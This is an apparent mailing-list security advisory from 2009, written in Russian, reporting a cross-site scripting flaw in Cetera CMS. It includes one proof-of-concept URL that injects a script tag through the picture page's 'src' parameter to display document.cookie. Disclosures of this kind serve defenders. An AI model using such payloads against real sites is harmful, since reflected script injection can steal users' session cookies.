Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

EZ-Blog Beta 1 Multiple SQL Injection

BlogMan 0.45 Multiple Vulnerabilities

YEKTA WEB Academic Web Tools CMS Multiple XSS

Afian Document Manager Local File Inclusion

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	02.03.2009
Subject:	Cross-Site Scripting vulnerability in Cetera CMS

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Cross-Site Scripting уязвимости в системе Cetera CMS.

XSS:

http:
//site/misc/picture/?src=%3C/title%3E%3Cscript%3Ealert(docume
nt.cookie)%3C/script%3E

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/2925/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua